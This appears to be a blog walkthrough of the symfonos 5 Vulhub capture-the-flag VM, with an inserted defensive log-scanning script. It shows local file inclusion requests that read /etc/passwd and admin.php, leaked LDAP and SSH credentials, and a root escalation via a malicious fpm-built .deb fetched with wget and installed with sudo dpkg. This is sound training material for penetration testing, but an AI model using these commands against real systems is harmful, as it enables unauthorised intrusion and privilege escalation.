symfonos 5 walkthrough Vulhub CTF

Today we are solving Vulhub CTF

The symfonos VM is made by Zayotic. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

It is a beginner-level, real-life based lab and is very handy for brushing up your skills as a penetration tester.

Network Scanning

To identify the target IP address, we start with netdiscover.

netdiscover

Next we run an advanced network scan using the Nmap aggressive scan, covering all ports and services.

We see that the target system has port 21 (ssh), 80 (HTTP) and 389 (LDAP) services running.

Since port 80 is open, we open the IP address in the web browser.

I add the target VM's IP address to our /etc/hosts file as symfonos.server.

vi /etc/hosts

Directory Bruteforcing

We chose DIRB for a directory brute-force attack to find all the directories on the server.

After brute-forcing the directories we see admin.php. Open it in any web browser.

I am using Firefox and I see a simple login page. I tried a password brute force with Burp Suite, but no correct credentials were found. I then tried to open the home page, but it redirects to the admin page.

http://symfonos.server/admin.php

Next I fetch the source code of the target's home page using the curl tool.

We see that the home.php URL is redirecting to a PHP file on localhost.

curl http://symfonos.server/home.php

Try LFI with curl tool

We see the target's passwd file, which means the target is vulnerable to LFI.

curl http://symfonos.server/home.php?url=etc/passwd

Next, try reading the source code of the admin.php file.

curl http://symfonos.server/home.php?url=admin.php

We got an LDAP username and password:

 $bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
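The two home.php requests above work because the url parameter accepts a bare local path. As a defender-side illustration (an added example, not part of the original walkthrough), this script flags such requests in a web access log; the log format, the sample lines and the assumption that legitimate values are http URLs on localhost are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate values of home.php's url parameter are http URLs on localhost.
ALLOWED_SCHEMES = {"http"}
ALLOWED_HOSTS = {"127.0.0.1", "localhost"}

# Client, request target and status from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def classify_url_param(value):
    """Return None for an expected include target, else the reason it is suspicious."""
    parts = urlsplit(value)
    if not parts.scheme:
        return "local path (no scheme)"
    if parts.scheme not in ALLOWED_SCHEMES:
        return f"unexpected scheme {parts.scheme!r}"
    if parts.hostname not in ALLOWED_HOSTS:
        return f"unexpected host {parts.hostname!r}"
    return None

def find_suspicious(log_lines, script="/home.php", param="url"):
    """Return (client, value, status, reason) for each flagged request."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        req = urlsplit(target)
        if req.path != script:
            continue
        for value in parse_qs(req.query).get(param, []):
            reason = classify_url_param(value)
            if reason:
                findings.append((client, value, int(status), reason))
    return findings

# Constructed sample log lines (not captured from the lab).
SAMPLE_LOG = [
    '192.168.0.103 - - [01/Jan/2020:10:00:01 +0000] "GET /home.php?url=http://127.0.0.1/page.php HTTP/1.1" 200 1650',
    '192.168.0.103 - - [01/Jan/2020:10:00:09 +0000] "GET /home.php?url=etc/passwd HTTP/1.1" 200 1432',
    '192.168.0.103 - - [01/Jan/2020:10:00:15 +0000] "GET /home.php?url=admin.php HTTP/1.1" 200 2210',
    '192.168.0.103 - - [01/Jan/2020:10:00:20 +0000] "GET /admin.php HTTP/1.1" 200 1650',
]

if __name__ == "__main__":
    for client, value, status, reason in find_suspicious(SAMPLE_LOG):
        print(f"{client} url={value!r} status={status}: {reason}")
```

The same classify_url_param check, applied server-side before the parameter is used, is the allowlist that would have rejected both requests.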

I run the Nmap ldap-search script to log in with the username and password.

 nmap --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local",ldap.password="qMDdyZh3cT6eeAWD"' 192.168.0.104 -p389

Try to log in over an SSH connection with the credentials from the search output.

userPassword: cetkKf4wCuHC9FET
mail: [email protected]

  • username: zeus
  • password: cetkKf4wCuHC9FET
ssh [email protected]
id

Privilege Escalation

Run sudo -l to check for commands that can be run with sudo. It looks like dpkg can be run with sudo.

sudo -l

After searching the internet, we find some information about building packages with fpm.

TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

After generating the .deb file, download it to the target's /tmp directory. I start our simple Python server and use wget to download the file on the target system.

cd /tmp
wget http://192.168.0.103:99/x_1.0_all.deb

I install the package with dpkg and our shell changes from a normal user to the root user.

sudo dpkg -i x_1.0_all.deb
id
cd /root
cat proof.txt

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
